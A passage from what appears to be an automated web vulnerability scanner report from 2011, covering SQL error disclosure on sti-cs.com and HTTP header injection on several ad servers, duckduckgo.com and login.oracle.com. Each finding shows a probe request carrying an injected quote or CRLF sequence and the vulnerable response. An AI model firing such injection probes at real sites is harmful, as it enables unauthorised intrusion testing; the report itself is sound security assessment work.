Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 2 (redirected)

HTTP/1.1 302 Found
Server: nginx/0.8.53
Date: Sat, 26 Feb 2011 23:19:37 GMT
Content-Type: text/plain
Connection: close
Set-Cookie: referrer=; domain=.dreamhost.com; path=/; expires=Sun, 27-Feb-2011 23:13:19 GMT
Set-Cookie: referred=rewards%7C1%27%27%3D1; domain=.dreamhost.com; path=/; expires=Sun, 27-Feb-2011 23:13:19 GMT
Set-Cookie: redir=12722600; domain=.dreamhost.com; path=/; expires=Sun, 27-Feb-2011 23:13:19 GMT
Location: http://www.dreamhost.com/
Content-Length: 0


1.30. http://www.sti-cs.com/Portfolio/Trades-and-Exhibits/id-24/page-1/ [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.sti-cs.com
Path:   /Portfolio/Trades-and-Exhibits/id-24/page-1/

Remediation detail

The application should handle errors gracefully and prevent SQL error messages from being returned in responses.

Request

GET /Portfolio/Trades-and-Exhibits/id-24'/page-1/ HTTP/1.1
Host: www.sti-cs.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=249072581.1298752883.1.1.utmcsr=thedetroitbureau.com|utmccn=(referral)|utmcmd=referral|utmcct=/about-us/; __utma=249072581.1903656466.1298752883.1298752883.1298757236.2; __utmc=249072581; __utmb=249072581.1.10.1298757236;

Response

HTTP/1.1 200 OK
Date: Sat, 26 Feb 2011 23:18:56 GMT
Server: Apache/2.2.14 (Unix) FrontPage/5.0.2.2635
X-Powered-By: PHP/5.2.13
Connection: close
Content-Type: text/html
Content-Length: 14497

...


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" >
<HTML>
   <HEAD>
<title>Trades and Exhibits :: STI - Creative Services</title>

<script type="text/javascript" language="javascript
...[SNIP]...
</b>: mysql_fetch_assoc(): supplied argument is not a valid MySQL result resource in <b>
...[SNIP]...

1.31. http://www.sti-cs.com/Portfolio/Trades-and-Exhibits/id-25/page-1/ [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.sti-cs.com
Path:   /Portfolio/Trades-and-Exhibits/id-25/page-1/

Remediation detail

The application should handle errors gracefully and prevent SQL error messages from being returned in responses.

Request

GET /Portfolio/Trades-and-Exhibits/id-25'/page-1/ HTTP/1.1
Host: www.sti-cs.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=249072581.1298752883.1.1.utmcsr=thedetroitbureau.com|utmccn=(referral)|utmcmd=referral|utmcct=/about-us/; __utma=249072581.1903656466.1298752883.1298752883.1298757236.2; __utmc=249072581; __utmb=249072581.1.10.1298757236;

Response

HTTP/1.1 200 OK
Date: Sat, 26 Feb 2011 23:19:03 GMT
Server: Apache/2.2.14 (Unix) FrontPage/5.0.2.2635
X-Powered-By: PHP/5.2.13
Connection: close
Content-Type: text/html
Content-Length: 14497

...


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" >
<HTML>
   <HEAD>
<title>Trades and Exhibits :: STI - Creative Services</title>

<script type="text/javascript" language="javascript
...[SNIP]...
</b>: mysql_fetch_assoc(): supplied argument is not a valid MySQL result resource in <b>
...[SNIP]...

1.32. http://www.sti-cs.com/Portfolio/Trades-and-Exhibits/id-7/page-1/ [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.sti-cs.com
Path:   /Portfolio/Trades-and-Exhibits/id-7/page-1/

Remediation detail

The application should handle errors gracefully and prevent SQL error messages from being returned in responses.

Request

GET /Portfolio/Trades-and-Exhibits/id-7'/page-1/ HTTP/1.1
Host: www.sti-cs.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=249072581.1298752883.1.1.utmcsr=thedetroitbureau.com|utmccn=(referral)|utmcmd=referral|utmcct=/about-us/; __utma=249072581.1903656466.1298752883.1298752883.1298757236.2; __utmc=249072581; __utmb=249072581.1.10.1298757236;

Response

HTTP/1.1 200 OK
Date: Sat, 26 Feb 2011 23:18:51 GMT
Server: Apache/2.2.14 (Unix) FrontPage/5.0.2.2635
X-Powered-By: PHP/5.2.13
Connection: close
Content-Type: text/html
Content-Length: 14496

...


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" >
<HTML>
   <HEAD>
<title>Trades and Exhibits :: STI - Creative Services</title>

<script type="text/javascript" language="javascript
...[SNIP]...
</b>: mysql_fetch_assoc(): supplied argument is not a valid MySQL result resource in <b>
...[SNIP]...

2. HTTP header injection  previous  next
There are 11 instances of this issue:

Issue background

HTTP header injection vulnerabilities arise when user-supplied data is copied into a response header in an unsafe way. If an attacker can inject newline characters into the header, then they can inject new HTTP headers and also, by injecting an empty line, break out of the headers into the message body and write arbitrary content into the application's response.

Various kinds of attack can be delivered via HTTP header injection vulnerabilities. Any attack that can be delivered via cross-site scripting can usually be delivered via header injection, because the attacker can construct a request which causes arbitrary JavaScript to appear within the response body. Further, it is sometimes possible to leverage header injection vulnerabilities to poison the cache of any proxy server via which users access the application. Here, an attacker sends a crafted request which results in a "split" response containing arbitrary content. If the proxy server can be manipulated to associate the injected response with another URL used within the application, then the attacker can perform a "stored" attack against this URL which will compromise other users who request that URL in future.



2.1. http://ad.doubleclick.net/adi/N2524.134426.0710433834321/B4169763.45 [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/N2524.134426.0710433834321/B4169763.45

Request

GET /38f9f%0d%0a80c0ca18afd/N2524.134426.0710433834321/B4169763.45;sz=728x90;click=http://googleads.g.doubleclick.net/aclk?sa=l&ai=BAl12x8lrTYPrB4m1sQe_0sHvCo2HpOsBhaKK8hLjqLazM_DLmgIQARgBIL7O5Q04AFDEwrTWBmDJhqOH1KOAEKABo67u9gO6AQk3Mjh4OTBfYXPIAQnaAV9maWxlOi8vL0M6L2Nkbi9leGFtcGxlcy9uZXRzcGFya2VyL2Jvb2xlYW4tc3FsLWluamVjdGlvbi1kYXRhYmFzZS11c2VyLWFkbWluLXhzcy1iaXpmaW5kLnVzLmh0bbgCGMACBcgC5e_FGKgDAdEDgo3m5suica71AwAAAMQ&num=1&sig=AGiWqtyRQEvi6hNd5BHN9N011_vfoVSX9g&client=ca-pub-4063878933780912&adurl=;ord=196821162? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://googleads.g.doubleclick.net/pagead/ads?client=ca-pub-4063878933780912&output=html&h=90&slotname=2510184792&w=728&lmt=1298931268&flash=10.2.154&url=file%3A%2F%2F%2FC%3A%2Fcdn%2Fexamples%2Fnetsparker%2Fboolean-sql-injection-database-user-admin-xss-bizfind.us.htm&dt=1298909668737&shv=r20101117&jsv=r20110208&saldr=1&correlator=1298909668759&frm=0&adk=1607234649&ga_vid=1614914732.1298909669&ga_sid=1298909669&ga_hid=454076219&ga_fc=0&u_tz=-360&u_his=1&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=44&biw=1116&bih=939&fu=0&ifi=1&dtd=88&xpc=pfUEHUtOKO&p=file%3A//
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c708f553300004b|578176/951462/15032,1906242/708168/15022|t=1297805141|et=730|cs=v3vpvykb

Response

HTTP/1.1 302 Moved Temporarily
Content-Type: text/html
Content-Length: 36
Location: http://static.2mdn.net/38f9f
80c0ca18afd
/N2524.134426.0710433834321/B4169763.45;sz=728x90;click=http: //googleads.g.doubleclick.net/aclk
Date: Mon, 28 Feb 2011 16:16:15 GMT
Server: GFE/2.0

<h1>Error 302 Moved Temporarily</h1>

2.2. http://ad.doubleclick.net/adj/N2998.159462.7724395940621/B4924654.4 [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adj/N2998.159462.7724395940621/B4924654.4

Request

GET /2de58%0d%0a6d24920450/N2998.159462.7724395940621/B4924654.4;sz=728x90;pc=[TPAS_ID];click=http%3A//at.atwola.com/adlink%2F5113%2F679707%2F0%2F225%2FAdId%3D1200168%3BBnId%3D3%3Bitime%3D828708808%3Bkvpg%3Dwinamp%2Fskin%2Fslick-redux%2F222084%3Bkvugc%3D0%3Bkvui%3Df2ed797a429811e090debf3ab4450fde%3Bkvmn%3D93166279%3Bkvtid%3D16lsqii1n1a3cr%3Bkr2703%3D147217%3Bkvseg%3D99999%3A53575%3A53656%3A56768%3A56830%3A56835%3A60515%3A53615%3A52766%3A60130%3A50213%3A50239%3A60190%3A50215%3Bkp%3D86178%3Bnodecode%3Dyes%3Blink%3D;ord=828708808? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.winamp.com/_uac/adpage.html
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c708f553300004b|578176/951462/15032,1906242/708168/15022|t=1297805141|et=730|cs=v3vpvykb

Response

HTTP/1.1 302 Moved Temporarily
Content-Type: text/html
Content-Length: 36
Location: http://static.2mdn.net/2de58
6d24920450
/N2998.159462.7724395940621/B4924654.4;sz=728x90;pc=[TPAS_ID];click=http: //at.atwola.com/adlink/5113/679707/0/225/AdId=1200168;BnId=3;itime=828708808;kvpg=winamp/skin/slick-redux/222084;kvugc=0;kvui=f2ed797a429811e090debf3ab4450fde;kvmn=93166279;kvtid=16lsqii1n1a3cr;kr2703=147217;k
Date: Sun, 27 Feb 2011 17:46:27 GMT
Server: GFE/2.0

<h1>Error 302 Moved Temporarily</h1>

2.3. http://ad.doubleclick.net/adj/N2998.159462.7724395940621/B5077405.10 [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adj/N2998.159462.7724395940621/B5077405.10

Request

GET /62182%0d%0a5ce3b6d291b/N2998.159462.7724395940621/B5077405.10;sz=728x90;pc=[TPAS_ID];click=http%3A//at.atwola.com/adlink%2F5113%2F851061%2F0%2F225%2FAdId%3D1312688%3BBnId%3D3%3Bitime%3D828694819%3Bkvpg%3Dwinamp%3Bkvugc%3D0%3Bkvui%3Df2ed797a429811e090debf3ab4450fde%3Bkvmn%3D93302596%3Bkvtid%3D16lsqii1n1a3cr%3Bkr2703%3D147217%3Bkvseg%3D99999%3A53575%3A53656%3A56768%3A56830%3A56835%3A60515%3A53615%3A52766%3A60130%3A50213%3A50239%3A60190%3A50215%3Bkp%3D86178%3Bnodecode%3Dyes%3Blink%3D;ord=828694819? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.winamp.com/_uac/adpage.html
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c708f553300004b|578176/951462/15032,1906242/708168/15022|t=1297805141|et=730|cs=v3vpvykb

Response

HTTP/1.1 302 Moved Temporarily
Content-Type: text/html
Content-Length: 36
Location: http://static.2mdn.net/62182
5ce3b6d291b
/N2998.159462.7724395940621/B5077405.10;sz=728x90;pc=[TPAS_ID];click=http: //at.atwola.com/adlink/5113/851061/0/225/AdId=1312688;BnId=3;itime=828694819;kvpg=winamp;kvugc=0;kvui=f2ed797a429811e090debf3ab4450fde;kvmn=93302596;kvtid=16lsqii1n1a3cr;kr2703=147217;kvseg=99999:53575:53656
Date: Sun, 27 Feb 2011 17:46:04 GMT
Server: GFE/2.0

<h1>Error 302 Moved Temporarily</h1>

2.4. http://bs.serving-sys.com/BurstingPipe/adServer.bs [eyeblaster cookie]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://bs.serving-sys.com
Path:   /BurstingPipe/adServer.bs

Request

GET /BurstingPipe/adServer.bs?cn=rsb&c=28&pli=2240932&PluID=0&w=125&h=125&ord=773834383&ucm=true&ncu=$$http://at.atwola.com/adlink/5113/1838222/0/6/AdId=1468660;BnId=1;itime=773834383;kvpg=techcrunch%2F2011%2F02%2F16%2Fforbes%2Daccused%2Dof%2Dlink%2D;kvugc=0;kvmn=93311144;kvtid=16lsqii1n1a3cr;kvseg=99999:53575:53656:54063:56768:56830:56835:60506:60515:53615:52766:60130:50213:50239;nodecode=yes;link=$$ HTTP/1.1
Host: bs.serving-sys.com
Proxy-Connection: keep-alive
Referer: http://techcrunch.com/wp-content/themes/vip/tctechcrunch/_uac/adpage.html
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: C4=; eyeblaster=BWVal=&BWDate=&debuglevel=51ad3%0d%0aeafac43fb55; A3=heSmakIJ0c9M00001hvPTaiJy0c6L00001gIlWai180aCf00001gnhgai180cbS00001; B3=8r8g0000000001tf7.Ws0000000001tf8z130000000001th8qaI0000000001tn; u2=3a6c8499-0c84-46b7-b54f-f22315d657803GI08g

Response

HTTP/1.1 200 OK
Cache-Control: no-cache, no-store
Pragma: no-cache
Content-Type: text/html
Expires: Sun, 05-Jun-2005 22:00:00 GMT
Vary: Accept-Encoding
Set-Cookie: eyeblaster=BWVal=&BWDate=&debuglevel=51ad3
eafac43fb55
; expires=Fri, 27-May-2011 21: 31:25 GMT; domain=bs.serving-sys.com; path=/
Set-Cookie: A3=heSmakII0c9M00001hvPTaiJy0c6L00001gIlWai180aCf00001gnhgai180cbS00001hK5AalZb0bfZ00001; expires=Fri, 27-May-2011 21:31:25 GMT; domain=.serving-sys.com; path=/
Set-Cookie: B3=8r8g0000000001tf7.Ws0000000001tf8z130000000001th8z6A0000000001tq8qaI0000000001tn; expires=Fri, 27-May-2011 21:31:25 GMT; domain=.serving-sys.com; path=/
Set-Cookie: u2=3a6c8499-0c84-46b7-b54f-f22315d657803GI08g; expires=Fri, 27-May-2011 21:31:25 GMT; domain=.serving-sys.com; path=/
P3P: CP="NOI DEVa OUR BUS UNI"
Date: Sun, 27 Feb 2011 02:31:24 GMT
Connection: close
Content-Length: 2193

var ebPtcl="http://";var ebBigS="ds.serving-sys.com/BurstingCachedScripts/";var ebResourcePath="ds.serving-sys.com/BurstingRes//";var ebRand=new String(Math.random());ebRand=ebRand.substr(ebRand.index
...[SNIP]...

2.5. https://duckduckgo.com/html/ [q parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   https://duckduckgo.com
Path:   /html/

Request

GET /html/?q=f0851%0d%0acb305ffa446 HTTP/1.1
Host: duckduckgo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: r=b; _qwerly_session=BAh7BkkiD3Nlc3Npb25faWQGOgZFRiIlNmEyNjY3MDlhZTM2NTU2ZTgyMTVkMDU4YjA0NGM1N2U%3D--a3ff7117063a64b625b1f054be974d11770445b9;

Response

HTTP/1.1 200 OK
Server: nginx
Date: Tue, 01 Mar 2011 02:56:40 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
Q: f0851
cb305ffa446
Status: 200 OK
Expires: Tue, 01 Mar 2011 02:56:41 GMT
Cache-Control: max-age=1
Content-Length: 7794

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<!-- link href="http
...[SNIP]...

2.6. https://login.oracle.com/pls/orasso/orasso.wwsso_app_admin.ls_login [Site2pstoreToken parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   https://login.oracle.com
Path:   /pls/orasso/orasso.wwsso_app_admin.ls_login

Request

GET /pls/orasso/orasso.wwsso_app_admin.ls_login?Site2pstoreToken=v1.2~0C25F121~9C51B8961B0BEE62C235D9981929BC4F647A28F1F31C94036D74F1A5E13A0F4AF69344BB8BFE2CCC4E4BA038F376B1F8F5B2E8595DA9DAF5B04B5A510BDF44115C7473F2DA7EAD602B1E84D73F81E9C62AD2CA7427218458FF680857B8E3A2BFA7DD4E5EA778C006A7FB33F7A097997EC71401BB23C47CDE6194A69447A9FEA13033EC8A4486E1628819141F7F5E8B7056B6CB67F92A3878AF3C9C8A53054E35AE6035D9B1F00A728E70508C8EAAC0F8EB6D650ABB5BBF7F094E1C06DED755B88DB2CC1E54419232653F14B4A0D0B010BB6A40A850A0EB3079184428D7A6BFF774E98880958EF424128EA8C2BBED4084FD9F5872ADDC4E96EE6FAE63FDBD4937A5F1F33460DA87D4E77D9BDF09712D83C99E08C74D02C39A42F572FCF0D86F2F1D393A5194B2ECB51FC4425032D1EC6F295EDF49D39637DD8E76B66685D5F27911B2DD48693E205B5D26ABDD90C451BBB7C0F6CA17DDB0E3B29A05276C2ADCEC8B225E02A2F5AA184EE02C53232F29F14718B4ECE453E3769A2A2A2FAD711D558F1975554DB58D9C5745DE9E5F6155906B91FF4993EFD85AC5864A623416EC8675F6135244591052B772540C0C7F85FEBAE095AE138BC30C7203328010D7B707A64E5526BBB307B7E040D449D3FF170BD7409B6989545B461DF307148CFCDE8D1B819BB6B7CDEBD5C93D123B7E322F07594B58306C641F24F86C24A1B4043153C8D897629D543A088E094C2C6DC875F661AD72A0A8BF38CB14B18CB7ED64FF47F67F55BC9141F055AB50B5DA9263CBFAD90C928E5E675A113623849A115E499F427E684266F55C8FD2CF608DCBA8C6D4997D9DAF5C9ECFE3927C3212634892A717505B7D31520AB9DAAF8D181BADE99FAD2C5F3BD9025A687E23DA7B0A13E53FEDE780D7D968C6AD17DEE73F2904BE7D.21d1d%0d%0adea71b54e71 HTTP/1.1
Host: login.oracle.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ORASSO_AUTH_HINT=v1.0~20110227072629; s_cc=true; gpv_p24=https%3A//myprofile.oracle.com/EndUser/faces/profile/createUser.jspx%3FnextURL%3Dhttp%253A%252F%252Flandingpad.oracle.com%252Fwebapps%252Fdialogue%252Fdlgpage.jsp%253Fp_dlg_id%253D8810727%2526src%253D6804803%2526act%253D24%2526id1%253D8810728%2526id2%253D8810730%2526r1%253D-1%2526r2%253D-1%2526r0%253D-1%2526pe%253Dnull%2526pr%253D365.0%2526pt%253DY%2526pd%253DY%2526xs%253D6804803%2526xa%253D24%2526pu%253DNull%2526po%253DWWMK09049794MP%2526ps%253DN%2526p_ext%253DY%2526p_tm%253DNull; BIGipServerloginadc_oracle_com_http=2030932621.25630.0000; s_sq=oracleglobal%2Coraclecom%3D%2526pid%253Dhttps%25253A//myprofile.oracle.com/EndUser/faces/profile/createUser.jspx%25253FnextURL%25253Dhttp%2525253A%2525252F%2525252Flandingpad.oracle.com%2525252Fwebapps%2525252Fdialogue%2525252Fdlgpage.jsp%2525253Fp_dlg_id%2525253D8810727%25252526src%2525253D6804803%25252526act%2525253D24%25252526id1%2525253D8810728%25252526id2%2525253D8810730%25252526r1%2525253D-1%25252526r2%2525253D-1%25252526r0%2525253D-1%252525%2526oid%253Dhttps%25253A//myprofile.oracle.com/EndUser/faces/profile/sso/updateUser.jspx%25253FnextURL%25253Dhttp%2525253A%2525252F%2525252Flandingp%2526ot%253DA; s_nr=1298762800321; gpw_e24=https%3A//myprofile.oracle.com/EndUser/faces/profile/createUser.jspx%3FnextURL%3Dhttp%253A%252F%252Flandingpad.oracle.com%252Fwebapps%252Fdialogue%252Fdlgpage.jsp%253Fp_dlg_id%253D8810727%2526src%253D6804803%2526act%253D24%2526id1%253D8810728%2526id2%253D8810730%2526r1%253D-1%2526r2%253D-1%2526r0%253D-1%2526pe%253Dnull%2526pr%253D365.0%2526pt%253DY%2526pd%253DY%2526xs%253D6804803%2526xa%253D24%2526pu%253DNull%2526po%253DWWMK09049794MP%2526ps%253DN%2526p_ext%253DY%2526p_tm%253DNull;

Response

HTTP/1.1 302 Moved Temporarily
Date: Sat, 26 Feb 2011 23:29:47 GMT
Server: Oracle-Application-Server-10g/10.1.2.0.2 Oracle-HTTP-Server
Content-Length: 4725
Set-Cookie: ORASSO_AUTH_HINT=v1.0~20110227072947; Domain=.oracle.com; Path=/
Cache-Control: private
Location: https://login.oracle.com/mysso/signon.jsp?site2pstoretoken=v1.2~0C25F121~9C51B8961B0BEE62C235D9981929BC4F647A28F1F31C94036D74F1A5E13A0F4AF69344BB8BFE2CCC4E4BA038F376B1F8F5B2E8595DA9DAF5B04B5A510BDF44115C7473F2DA7EAD602B1E84D73F81E9C62AD2CA7427218458FF680857B8E3A2BFA7DD4E5EA778C006A7FB33F7A097997EC71401BB23C47CDE6194A69447A9FEA13033EC8A4486E1628819141F7F5E8B7056B6CB67F92A3878AF3C9C8A53054E35AE6035D9B1F00A728E70508C8EAAC0F8EB6D650ABB5BBF7F094E1C06DED755B88DB2CC1E54419232653F14B4A0D0B010BB6A40A850A0EB3079184428D7A6BFF774E98880958EF424128EA8C2BBED4084FD9F5872ADDC4E96EE6FAE63FDBD4937A5F1F33460DA87D4E77D9BDF09712D83C99E08C74D02C39A42F572FCF0D86F2F1D393A5194B2ECB51FC4425032D1EC6F295EDF49D39637DD8E76B66685D5F27911B2DD48693E205B5D26ABDD90C451BBB7C0F6CA17DDB0E3B29A05276C2ADCEC8B225E02A2F5AA184EE02C53232F29F14718B4ECE453E3769A2A2A2FAD711D558F1975554DB58D9C5745DE9E5F6155906B91FF4993EFD85AC5864A623416EC8675F6135244591052B772540C0C7F85FEBAE095AE138BC30C7203328010D7B707A64E5526BBB307B7E040D449D3FF170BD7409B6989545B461DF307148CFCDE8D1B819BB6B7CDEBD5C93D123B7E322F07594B58306C641F24F86C24A1B4043153C8D897629D543A088E094C2C6DC875F661AD72A0A8BF38CB14B18CB7ED64FF47F67F55BC9141F055AB50B5DA9263CBFAD90C928E5E675A113623849A115E499F427E684266F55C8FD2CF608DCBA8C6D4997D9DAF5C9ECFE3927C3212634892A717505B7D31520AB9DAAF8D181BADE99FAD2C5F3BD9025A687E23DA7B0A13E53FEDE780D7D968C6AD17DEE73F2904BE7D.21d1d
dea71b54e71
&p_error_code=&p_submit_url=https%3A%2F%2Flogin.oracle.com%2Fsso%2Fauth&p_cancel_url=https%3A%2F%2Flogin.oracle.com&ssousername=&subscribername=
Connection: close
Content-Type: text/html; charset=UTF-8
Set-Cookie: BIGipServerloginadc_oracle_com_http=2030932621.25630.0000; expires=Sun, 27-Feb-2011 07:29:47 GMT; path=/

<HTML><HEAD><TITLE>Redirect to https://login.oracle.com/mysso/signon.jsp?site2pstoretoken=v1.2~0C25F121~9C51B8961B0BEE62C235D9981929BC4F647A28F1F31C94036D74F1A5E13A0F4AF69344BB8BFE2CCC4E4BA038F376B1F8
...[SNIP]...

2.7. http://tacoda.at.atwola.com/rtx/r.js [N cookie]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://tacoda.at.atwola.com
Path:   /rtx/r.js

Request

GET /rtx/r.js?cmd=ADN&si=18288&pi=M&xs=3&pu=http%253A//cdn.at.atwola.com/_media/uac/tcode3.html%253Fifu%253Dhttp%25253A//techcrunch.com/2011/02/16/forbes-accused-of-link-spam-plays-dumb-but-forgets-to-delete-all-the-links/%2526cmmiss%253D-1%2526cmkw%253D&r=&v=5.5&cb=60711 HTTP/1.1
Host: tacoda.at.atwola.com
Proxy-Connection: keep-alive
Referer: http://cdn.at.atwola.com/_media/uac/tcode3.html
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ATTACID=a3Z0aWQ9MTZsc3FpaTFuMWEzY3I=; ANRTT=53615^1^1299284361|52766^1^1299284361|60130^1^1298898484|50213^1^1298930280|50239^1^1298930837; TData=99999|^|53575|53656|54063|56768|56830|56835|60506|60515|#|53615|52766|60130|50213|50239; N=2:2d4ec7443dfa469e64430537b01b46dc,ca3680f9be00bf67dd48c45e051ee302bf012%0d%0af7b9b665bf; ATTAC=a3ZzZWc9OTk5OTk6NTM1NzU6NTM2NTY6NTQwNjM6NTY3Njg6NTY4MzA6NTY4MzU6NjA1MDY6NjA1MTU6NTM2MTU6NTI3NjY6NjAxMzA6NTAyMTM6NTAyMzk=; eadx=1; CfP=1; JEB2=4D69B03E6E651A440C6EAF39F001EBEA

Response

HTTP/1.1 200 OK
Date: Sun, 27 Feb 2011 02:35:33 GMT
Server: Apache/1.3.37 (Unix) mod_perl/1.29
P3P: policyref="http://www.tacoda.com/w3c/p3p.xml", CP="NON DSP COR NID CURa ADMo DEVo TAIo PSAo PSDo OUR DELa IND PHY ONL UNI COM NAV DEM"
P3P: policyref="http://www.tacoda.com/w3c/p3p.xml", CP="NON DSP COR NID CURa ADMo DEVo TAIo PSAo PSDo OUR DELa IND PHY ONL UNI COM NAV DEM"
Cache-Control: max-age=900
Expires: Sun, 27 Feb 2011 02:50:33 GMT
Set-Cookie: ATTACID=a3Z0aWQ9MTZsc3FpaTFuMWEzY3I=; path=/; expires=Wed, 22-Feb-12 02:35:33 GMT; domain=.at.atwola.com
Set-Cookie: ANRTT=53615^1^1299284361|52766^1^1299284361|60130^1^1298898484|50213^1^1298930280|50239^1^1298930837|60190^1^1299378933; path=/; expires=Sun, 06-Mar-11 02:35:33 GMT; domain=tacoda.at.atwola.com
Set-Cookie: Tsid=0^1298774133^1298775933|18288^1298774133^1298775933; path=/; expires=Sun, 27-Feb-11 03:05:33 GMT; domain=tacoda.at.atwola.com
Set-Cookie: TData=99999|^|53575|53656|56768|56830|56835|60515|#|53615|52766|60130|50213|50239|60190; expires=Wed, 22-Feb-12 02:35:33 GMT; path=/; domain=tacoda.at.atwola.com
Set-Cookie: Anxd=x; expires=Sun, 27-Feb-11 08:35:33 GMT; path=/; domain=tacoda.at.atwola.com
Set-Cookie: N=2:ca3680f9be00bf67dd48c45e051ee302bf012
f7b9b665bf
,c638727a4faa7467533adb5623113b72; expires=Wed, 22-Feb-12 02:35:33 GMT; path=/; domain=tacoda.at.atwola.com
Set-Cookie: ATTAC=a3ZzZWc9OTk5OTk6NTM1NzU6NTM2NTY6NTY3Njg6NTY4MzA6NTY4MzU6NjA1MTU6NTM2MTU6NTI3NjY6NjAxMzA6NTAyMTM6NTAyMzk6NjAxOTA=; expires=Wed, 22-Feb-12 02:35:33 GMT; path=/; domain=.at.atwola.com
ntCoent-Length: 176
Content-Type: application/x-javascript
Content-Length: 176

var ANUT=1;
var ANOO=0;
var ANSR=1;
var ANTID='16lsqii1n1a3cr';
var ANSL='99999|^|53575|53656|56768|56830|56835|60515|#|53615|52766|60130|50213|50239|60190';
ANRTXR();


2.8. http://tacoda.at.atwola.com/rtx/r.js [si parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://tacoda.at.atwola.com
Path:   /rtx/r.js

Request

GET /rtx/r.js?cmd=ADN&si=8ecf0%0d%0a6420ebe94a&pi=M&xs=3&pu=http%253A//cdn.at.atwola.com/_media/uac/tcode3.html%253Fifu%253Dhttp%25253A//techcrunch.com/2011/02/16/forbes-accused-of-link-spam-plays-dumb-but-forgets-to-delete-all-the-links/%2526cmmiss%253D-1%2526cmkw%253D&r=&v=5.5&cb=60711 HTTP/1.1
Host: tacoda.at.atwola.com
Proxy-Connection: keep-alive
Referer: http://cdn.at.atwola.com/_media/uac/tcode3.html
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
